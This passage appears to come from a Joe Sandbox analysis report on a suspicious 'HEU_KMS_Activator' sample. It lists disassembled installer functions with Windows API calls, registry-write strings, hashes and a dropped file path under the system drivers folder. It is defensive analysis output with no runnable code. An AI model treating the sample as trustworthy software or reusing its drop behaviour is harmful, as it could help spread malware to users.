    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrcatlstrlenwvsprintf
    • String ID: New install of "%s" to "%s"${
    • API String ID: 672593662-1641061399
    • Opcode ID: 601142e147a0066dd3d69614aa6d8a70f662e3876f94f1329b31ffa4abc89d46
    • Instruction ID: 032d9592572399d254cc6fc43e6c7c03cb36b4908d517deda48261c0418abfdf
    • Opcode Fuzzy Hash: 601142e147a0066dd3d69614aa6d8a70f662e3876f94f1329b31ffa4abc89d46
    • Instruction Fuzzy Hash: 8CB17B71800208BFDB11AF61DD85EAE7FB9FB45354F10813AFA44BA1A0CB794A41DF58
    Function 00404721 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 469windowmemoryCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?,000003F9), ref: 00404738
    • GetDlgItem.USER32(?,00000408), ref: 00404745
    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404794
    • LoadBitmapA.USER32(0000006E), ref: 004047A7
    • SetWindowLongA.USER32(?,000000FC,Function_00004671), ref: 004047C1
    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047D3
    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047E7
    • SendMessageA.USER32(?,00001109,00000002), ref: 004047FD
    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404809
    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404819
    • DeleteObject.GDI32(?), ref: 0040481E
    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404849
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404855
    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048F5
    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404918
    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404929
    • GetWindowLongA.USER32(?,000000F0), ref: 00404953
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404962
    • ShowWindow.USER32(?,00000005), ref: 00404973
    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A70
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404AC8
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404ADD
    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B01
    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B27
    • ImageList_Destroy.COMCTL32(?), ref: 00404B3C
    • GlobalFree.KERNEL32(?), ref: 00404B4C
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404BBC
    • SendMessageA.USER32(?,00001102,?,?), ref: 00404C69
    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C78
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C98
    • ShowWindow.USER32(?,00000000), ref: 00404CE7
    • GetDlgItem.USER32(?,000003FE), ref: 00404CF2
    • ShowWindow.USER32(00000000), ref: 00404CF9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
    • String ID: $M$N
    • API String ID: 1638840714-813528018
    • Opcode ID: 7af6d020ed8754d060b0ff212d44134fc9ef58dd2d277f63f0a015343a46a201
    • Instruction ID: 82c7ba666a3c9d6b89a2c8c45721f0fc7104738e8b179a08c0a637a72377ac6d
    • Opcode Fuzzy Hash: 7af6d020ed8754d060b0ff212d44134fc9ef58dd2d277f63f0a015343a46a201
    • Instruction Fuzzy Hash: 83027EB0A00209AFEF109FA5CD45AAE7BB5FB84314F10853AF611B62E0D7789D91DF58
    Function 0040425D Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 293stringkeyboardCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?,000003F0), ref: 004042AE
    • IsDlgButtonChecked.USER32(?,000003F0), ref: 004042BC
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • GetDlgItem.USER32(?,000003FB), ref: 004042DC
    • GetAsyncKeyState.USER32(00000010), ref: 004042E3
    • GetDlgItem.USER32(?,000003F0), ref: 004042F3
    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404304
    • SetWindowTextA.USER32(?,?), ref: 00404333
    • SHBrowseForFolderA.SHELL32(?,0042A9D8,?), ref: 004043EA
    • lstrcmpiA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,004329D8), ref: 00404427
    • lstrcatA.KERNEL32(?,C:\Windows\SysNative\drivers\DvLayout.exe), ref: 00404433
      • Part of subcall function 00404170: lstrlenA.KERNEL32(004329D8,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,004329D8,?), ref: 00404207
      • Part of subcall function 00404170: wsprintfA.USER32 ref: 0040420F
      • Part of subcall function 00404170: SetDlgItemTextA.USER32(?,004329D8,000000DF), ref: 00404222
    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404443
    • CoTaskMemFree.OLE32(00000000), ref: 004043F5
      • Part of subcall function 004059DF: GetDlgItemTextA.USER32(00000001,00000001,00002000,00403E24), ref: 004059F2
      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D49
      • Part of subcall function 00405CE3: CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
      • Part of subcall function 00403D1A: lstrcatA.KERNEL32(00000000,00000000,00444380,00473000,install.log,00405803,00473000,00473000,00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006), ref: 00403D35
    • GetDiskFreeSpaceA.KERNEL32(004309D8,?,?,0000040F,?,004309D8,004309D8,?,00000000,004309D8,?,?,000003FB,?), ref: 004044FC
    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404517
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Item$CharText$Nextlstrcat$FreeWindow$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpilstrlenwsprintf
    • String ID: A$C:\Windows\SysNative\drivers\DvLayout.exe
    • API String ID: 856561098-543289465
    • Opcode ID: 9cb8a850940c117ae9918b06bedee8cee537e9a579c6043b719adc374c1cb9fe
    • Instruction ID: c836916bdd763984d0badc0942e4fb351485f7286358a5139267df7ee621e72d
    • Opcode Fuzzy Hash: 9cb8a850940c117ae9918b06bedee8cee537e9a579c6043b719adc374c1cb9fe
    • Instruction Fuzzy Hash: 05A163B1900219BBDB11AFA1CD85AAF7AB8EF84315F10403BF705B62D1DB7C99418B69
    Function 00402483 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146comCOMMON
    Download Yara Rule
    APIs
    • CoCreateInstance.OLE32(00408E9C,?,00000001,00408E8C,?), ref: 00402508
    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 004025C0
    Strings
    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 004024EA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ByteCharCreateInstanceMultiWide
    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
    • API String ID: 123533781-1377821865
    • Opcode ID: fb19eba547240b9af82341ebd456cded48a9d40c7292f28761688f9a22fbc9fd
    • Instruction ID: ace47b85452bd84cadd8e479b4ccfb42147929fec34fe95293edda35fc932576
    • Opcode Fuzzy Hash: fb19eba547240b9af82341ebd456cded48a9d40c7292f28761688f9a22fbc9fd
    • Instruction Fuzzy Hash: 6F513C74A00204BFCB009FA4CC89EAE7B79EF48324F20456AF915EB2D1C6799981CB94
    Function 00402C3F Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileA.KERNEL32(00000000,?), ref: 00402C4F
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileFindFirst
    • String ID:
    • API String ID: 1974802433-0
    • Opcode ID: d439e7825e9b1bc448a1f46a6c08d315882172a76c1b5308fd852264ee1cf628
    • Instruction ID: 97b2fa22783d7095cd0330a120db18b4810eebad07d313fd0386075e021dfce7
    • Opcode Fuzzy Hash: d439e7825e9b1bc448a1f46a6c08d315882172a76c1b5308fd852264ee1cf628
    • Instruction Fuzzy Hash: 04E03071504204ABD711E7A9DD499AE7768EF01324F10017AF202E61D2D6789A81AA29
    Function 00405203 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
    Download Yara Rule
    APIs
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040523F
    • ShowWindow.USER32(?), ref: 0040525C
    • DestroyWindow.USER32 ref: 00405270
    • SetWindowLongA.USER32(?,00000000,00000000), ref: 0040528C
    • GetDlgItem.USER32(?,?), ref: 004052AD
    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004052C1
    • IsWindowEnabled.USER32(00000000), ref: 004052C8
    • GetDlgItem.USER32(?,00000001), ref: 00405377
    • GetDlgItem.USER32(?,00000002), ref: 00405381
    • SetClassLongA.USER32(?,000000F2,?), ref: 0040539B
    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004053EC
    • GetDlgItem.USER32(?,00000003), ref: 00405492
    • ShowWindow.USER32(00000000,?), ref: 004054B4
    • EnableWindow.USER32(?,?), ref: 004054C6
    • EnableWindow.USER32(?,?), ref: 004054E1
    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004054F7
    • EnableMenuItem.USER32(00000000), ref: 004054FE
    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00405516
    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00405529
    • lstrlenA.KERNEL32(004329D8,?,004329D8,004447E0), ref: 00405552
    • SetWindowTextA.USER32(?,004329D8), ref: 00405561
    • ShowWindow.USER32(?,0000000A), ref: 00405695
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
    • String ID:
    • API String ID: 184305955-0
    • Opcode ID: cafbaa89cf17bd47a15370d00d5a5914febd65cdafe1135a92eaa80fb9b1b955
    • Instruction ID: 44a91638ef903288846a9e909085ee46f5a352f35d98ba10fe6debb500bac352
    • Opcode Fuzzy Hash: cafbaa89cf17bd47a15370d00d5a5914febd65cdafe1135a92eaa80fb9b1b955
    • Instruction Fuzzy Hash: 2DC10575540A04AFDB206F21EE45E2B3BA8FB46349F41083EF541B11F1CB7A98929F1E
    Function 00403EA1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 203windowstringCOMMON
    Download Yara Rule
    APIs
    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F29
    • GetDlgItem.USER32(00000000,000003E8), ref: 00403F3D
    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F5B
    • GetSysColor.USER32(?), ref: 00403F6C
    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F7B
    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F8A
    • lstrlenA.KERNEL32(?), ref: 00403F94
    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FA2
    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FB1
    • GetDlgItem.USER32(?,0000040A), ref: 00404014
    • SendMessageA.USER32(00000000), ref: 00404017
    • GetDlgItem.USER32(?,000003E8), ref: 00404042
    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404082
    • LoadCursorA.USER32(00000000,00007F02), ref: 00404091
    • SetCursor.USER32(00000000), ref: 0040409A
    • ShellExecuteA.SHELL32(0000070B,open,00440380,00000000,00000000,00000001), ref: 004040AD
    • LoadCursorA.USER32(00000000,00007F00), ref: 004040BA
    • SetCursor.USER32(00000000), ref: 004040BD
    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004040E9
    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004040FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$N$m>@$open
    • API String ID: 3615053054-1120229241
    • Opcode ID: c54931248dcf879a06aa9a813842b3089fb8890d335001570cbe3594db65afec
    • Instruction ID: 1975049c56b9601a5425fed2bd712eed394129e35b92e71f10f2f7ea666ba64f
    • Opcode Fuzzy Hash: c54931248dcf879a06aa9a813842b3089fb8890d335001570cbe3594db65afec
    • Instruction Fuzzy Hash: F061C5B1A40209BFEB109F20CD45F6A7BA8EB54711F10853AFB01BA1D1C7B8A9518F98
    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
    Download Yara Rule
    APIs
    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
    • BeginPaint.USER32(?,?), ref: 00401047
    • GetClientRect.USER32(?,?), ref: 0040105B
    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
    • DeleteObject.GDI32(?), ref: 004010ED
    • CreateFontIndirectA.GDI32(?), ref: 00401105
    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
    • SelectObject.GDI32(00000000,?), ref: 00401140
    • DrawTextA.USER32(00000000,004447E0,000000FF,00000010,00000820), ref: 00401156
    • SelectObject.GDI32(00000000,00000000), ref: 00401160
    • DeleteObject.GDI32(?), ref: 00401165
    • EndPaint.USER32(?,?), ref: 0040116E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
    • String ID: F
    • API String ID: 941294808-1304234792
    • Opcode ID: 77880ef570d62a16d8cf7c5fa31c9eac7f0d2e5bbdf6e433d85d255717e4766c
    • Instruction ID: 7739937ae11a4a4f511c9698d3863d45820df5c4cc4c93504ff595c60b8501fc
    • Opcode Fuzzy Hash: 77880ef570d62a16d8cf7c5fa31c9eac7f0d2e5bbdf6e433d85d255717e4766c
    • Instruction Fuzzy Hash: 3C419D71800209AFCB058FA5DE459BFBFB9FF45315F00842EF591AA1A0CB389A54DFA4
    Function 00406342 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000001,?,00000000,?,00000000,004066DB,?,00000000,000000F1,?), ref: 0040638F
    • GetShortPathNameA.KERNEL32(00000000,0043CA38,00000400), ref: 00406398
    • GetShortPathNameA.KERNEL32(?,0043D378,00000400), ref: 004063B5
    • wsprintfA.USER32 ref: 004063D3
    • GetFileSize.KERNEL32(00000000,00000000,0043D378,C0000000,00000004,0043D378,?,?,00000000,000000F1,?), ref: 0040640E
    • GlobalAlloc.KERNEL32(00000040,0000000A,?,00000000,000000F1,?), ref: 0040641D
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,000000F1,?), ref: 00406433
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0043CE38,00000000,-0000000A,00408D80,00000000,[Rename],?,00000000,000000F1,?), ref: 00406479
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,000000F1,?), ref: 0040648B
    • GlobalFree.KERNEL32(00000000), ref: 00406492
    • CloseHandle.KERNEL32(00000000,?,00000000,000000F1,?), ref: 00406499
      • Part of subcall function 00406096: lstrlenA.KERNEL32(0040644E,?,00000000,00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060A6
      • Part of subcall function 00406096: lstrlenA.KERNEL32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060D8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
    • String ID: %s=%s$[Rename]
    • API String ID: 3772915668-1727408572
    • Opcode ID: e95eebb9e35e7837ed5ad6776b7e6e7baf5215a500b877816413feacdc889103
    • Instruction ID: 41a4a4035eb1337026f82450ada37153d99fb5e45317e0033bff3861c67150e4
    • Opcode Fuzzy Hash: e95eebb9e35e7837ed5ad6776b7e6e7baf5215a500b877816413feacdc889103
    • Instruction Fuzzy Hash: 0741F4312407057FE620AB659E89F6B3A5CDF45714F06403AFA46F22C1EA7CA81486BD
    Function 0040281F Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
    Download Yara Rule
    APIs
    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?), ref: 0040287C
    • lstrlenA.KERNEL32(0040E100,?,?,?,?,?,?), ref: 004028A0
    • RegSetValueExA.ADVAPI32(?,?,?,?,0040E100,00000000,?,?,?,?,?,?), ref: 00402957
    • RegCloseKey.ADVAPI32(?), ref: 0040297F
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 004028F7
    • WriteReg: error creating key "%s\%s", xrefs: 00402990
    • WriteReg: error writing into "%s\%s" "%s", xrefs: 0040296F
    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 004028B8
    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 0040293E
    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 004028CA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$CloseCreateValuewvsprintf
    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
    • API String ID: 1641139501-220328614
    • Opcode ID: 256a036e278ec10d2bd3bd9b526ede0a4da94bd0469c50779f37e7ffe2799d44
    • Instruction ID: 991f797a34c1ccbfca1b03fe384b4556dbf9fbbaa1ce29d1e89c021fabe5d232
    • Opcode Fuzzy Hash: 256a036e278ec10d2bd3bd9b526ede0a4da94bd0469c50779f37e7ffe2799d44
